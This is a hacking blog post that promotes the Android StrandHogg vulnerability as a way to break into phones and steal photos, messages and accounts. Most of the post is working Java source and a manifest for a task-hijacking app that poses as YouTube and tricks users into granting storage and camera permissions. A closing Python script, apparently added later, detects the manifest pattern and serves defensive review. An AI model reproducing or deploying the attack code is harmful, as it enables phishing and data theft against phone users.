Peace be upon you, followers of the Shadow Hacker channel and blog. In this article I present the well-known Strandhogg vulnerability, which enables you to compromise Android phones and reach their photos and text messages, and even to bypass the social media accounts saved on the phone. The Strandhogg vulnerability is considered very dangerous because of the powerful permissions it obtains for compromising the phone and stealing its data.
The Strandhogg vulnerability for Android
Create a class named phishingAttack
package strandhogg.test;

import android.Manifest;
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.os.Build;

/*created by scream*/
@SuppressWarnings("all")
public final class phishingAttack {
    public static final String targetPackageName = "com.google.android.youtube";
    public static final String TAG = "scream\t";
    public static final int requestCode = 1;
    private static final int FLAGS_SINGLE_TOP = Intent.FLAG_ACTIVITY_CLEAR_TOP | Intent.FLAG_ACTIVITY_SINGLE_TOP;
    private static final int FLAGS_NEW_TASK = Intent.FLAG_ACTIVITY_CLEAR_TASK | Intent.FLAG_ACTIVITY_NEW_TASK;
    public static final String[] permissions = {
        Manifest.permission.READ_EXTERNAL_STORAGE,
        Manifest.permission.WRITE_EXTERNAL_STORAGE,
        Manifest.permission.CAMERA
    };

    public static void exploit(Context context , Activity activity , Class<?> targetActivityClass){
        if(!phishingAttack.isGranted(activity)){
            activity.startActivities(new Intent[]{
                new Intent(context,targetActivityClass).addFlags(FLAGS_SINGLE_TOP),
                new Intent(context,targetActivityClass).addFlags(FLAGS_SINGLE_TOP)
            });
        }
    }

    public static void toHome(Context context ,Activity activity) {
        context.startActivity(new Intent(Intent.ACTION_MAIN).addCategory(Intent.CATEGORY_HOME).addFlags(FLAGS_NEW_TASK));
        activity.moveTaskToBack(true);
    }

    public static Intent getLaunchIntent(Context context ,String packageName) {
        return context.getPackageManager().getLaunchIntentForPackage(packageName);
    }

    public static Intent getIntent(Context context ,String packageName, int value) {
        return new Intent(phishingAttack.getLaunchIntent(context,packageName)).addFlags(FLAGS_NEW_TASK).putExtra(TAG,value);
    }

    public static boolean isGranted(Activity activity){
        boolean granted = true;
        for (String permission: phishingAttack.permissions){
            if (activity.checkSelfPermission(permission) != PackageManager.PERMISSION_GRANTED){
                granted = false;
                break;
            }
        }
        return granted;
    }

    static void finish(Activity activity){
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP){
            activity.finishAndRemoveTask();
        }else{
            activity.finish();
        }
    }
}
Create a class named activity
package strandhogg.test;

import android.app.Activity;
import android.content.Context;
import android.content.pm.PackageManager;
import android.os.Build;
import android.os.Bundle;
import androidx.core.app.ActivityCompat;

/*created by scream*/
public class activity extends Activity {
    @Override
    protected void onPause() {
        super.onPause();
        overridePendingTransition(0, 0);
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
            ActivityCompat.requestPermissions(this, phishingAttack.permissions, phishingAttack.requestCode);
        }
    }

    private void startActivity(Context context , int value){
        startActivity(phishingAttack.getIntent(context,getPackageName(),value));
    }

    @Override
    public void onRequestPermissionsResult(int code, String[] permissions, int[] grantResults) {
        super.onRequestPermissionsResult(phishingAttack.requestCode, permissions, grantResults);
        if (code == phishingAttack.requestCode) {
            if (grantResults.length > 0){
                Context context = getApplicationContext();
                boolean granted = true;
                for (int grantResult : grantResults) {
                    if (grantResult != PackageManager.PERMISSION_GRANTED) {
                        granted = false;
                        break;
                    }
                }
                if(granted){
                    phishingAttack.finish(this);
                    startActivity(context,1);
                }else{
                    phishingAttack.finish(this);
                    startActivity(context,0);
                    android.os.Process.killProcess(android.os.Process.myPid());
                }
            }
        }
    }
}
And in the MainActivity class
package strandhogg.test;

import android.app.Activity;
import android.content.Context;
import android.os.Bundle;
import android.widget.Toast;

/*created by scream*/
public class MainActivity extends Activity {
    @Override
    protected void onPause() {
        super.onPause();
        overridePendingTransition(0, 0);
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Context context = getApplicationContext();
        int value = getValue(savedInstanceState,this);
        if(value == 0){
            if(!phishingAttack.isGranted(this)){
                phishingAttack.finish(this);
                phishingAttack.exploit(context,this, activity.class);
                phishingAttack.toHome(context,this);
            }else{
                phishingAttack.finish(this);
                phishingAttack.toHome(context,this);
                successful();
            }
        }else if(value == 1){
            phishingAttack.finish(this);
            phishingAttack.toHome(context,this);
            startActivity(phishingAttack.getIntent(context, phishingAttack.targetPackageName,-1));
            successful();
        }
    }

    private void successful(){
        Toast.makeText(this,"successful", Toast.LENGTH_LONG).show();
        System.out.println("Log++>" + "successful");
    }

    private int getValue(Bundle bundle, Activity activityView) {
        int value = 0;
        if (bundle == null) {
            Bundle extras = activityView.getIntent().getExtras();
            if(extras != null) {
                Object obj = extras.get(phishingAttack.TAG);
                if(obj != null){
                    value = (int) obj;
                }
            }
        } else {
            Object obj = bundle.get(phishingAttack.TAG);
            if(obj != null){
                value = (int) obj;
            }
        }
        return value;
    }
}
The manifest
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="strandhogg.test">
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <application
        android:allowBackup="true"
        android:icon="@android:mipmap/sym_def_app_icon"
        android:label="Youtube"
        android:roundIcon="@android:mipmap/sym_def_app_icon"
        android:supportsRtl="true"
        android:theme="@android:style/Theme.InputMethod"
        tools:ignore="AllowBackup">
        <activity android:name=".MainActivity"
            android:excludeFromRecents="true" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity
            android:name="strandhogg.test.activity"
            android:enabled="true"
            android:exported="true"
            android:excludeFromRecents="true"
            android:launchMode="singleTask"
            android:taskAffinity="com.google.android.youtube"
            android:theme="@android:style/Theme.InputMethod"
            />
    </application>
</manifest>
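
The manifest above is where this technique is visible to a reviewer: an activity declares a taskAffinity that names another app's package, together with launchMode singleTask. The following Python check is an added example, not part of the original post; it flags that pattern in a decoded AndroidManifest.xml and also tests whether an app resolves every activity to an empty taskAffinity, a commonly recommended app-side hardening. The function names and the embedded sample (reduced from the manifest above) are constructed for illustration.

```python
import xml.etree.ElementTree as ET

NS = "{http://schemas.android.com/apk/res/android}"

# Constructed sample, reduced from the manifest shown on this page.
SAMPLE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="strandhogg.test">
  <application android:label="Youtube">
    <activity android:name=".MainActivity" android:excludeFromRecents="true"/>
    <activity android:name="strandhogg.test.activity"
        android:exported="true" android:excludeFromRecents="true"
        android:launchMode="singleTask"
        android:taskAffinity="com.google.android.youtube"/>
  </application>
</manifest>"""

def effective_affinity(activity, app, package):
    """taskAffinity is inherited from <application>, then defaults to the package."""
    for element in (activity, app):
        value = element.get(NS + "taskAffinity")
        if value is not None:
            return value
    return package

def hijack_indicators(manifest_xml):
    """Map activity name -> reasons, for activities that claim a foreign task."""
    root = ET.fromstring(manifest_xml)
    package, app = root.get("package", ""), root.find("application")
    findings = {}
    for act in ([] if app is None else app.findall("activity")):
        affinity = effective_affinity(act, app, package)
        if affinity in ("", package):
            continue  # the app's own task, or no affinity at all
        reasons = ["taskAffinity=" + affinity]
        if act.get(NS + "launchMode") == "singleTask":
            reasons.append("launchMode=singleTask")
        for flag in ("allowTaskReparenting", "excludeFromRecents"):
            if act.get(NS + flag) == "true":
                reasons.append(flag)
        findings[act.get(NS + "name")] = reasons
    return findings

def opts_out_of_affinity(manifest_xml):
    """True when every activity resolves to the empty affinity (app-side hardening)."""
    root = ET.fromstring(manifest_xml)
    package, app = root.get("package", ""), root.find("application")
    acts = [] if app is None else app.findall("activity")
    return bool(acts) and all(effective_affinity(a, app, package) == "" for a in acts)

if __name__ == "__main__":
    for name, reasons in hijack_indicators(SAMPLE).items():
        print(name, "->", ", ".join(reasons))
```

A foreign taskAffinity on its own can be legitimate, so treat a hit as a reason to review the activity rather than as a verdict.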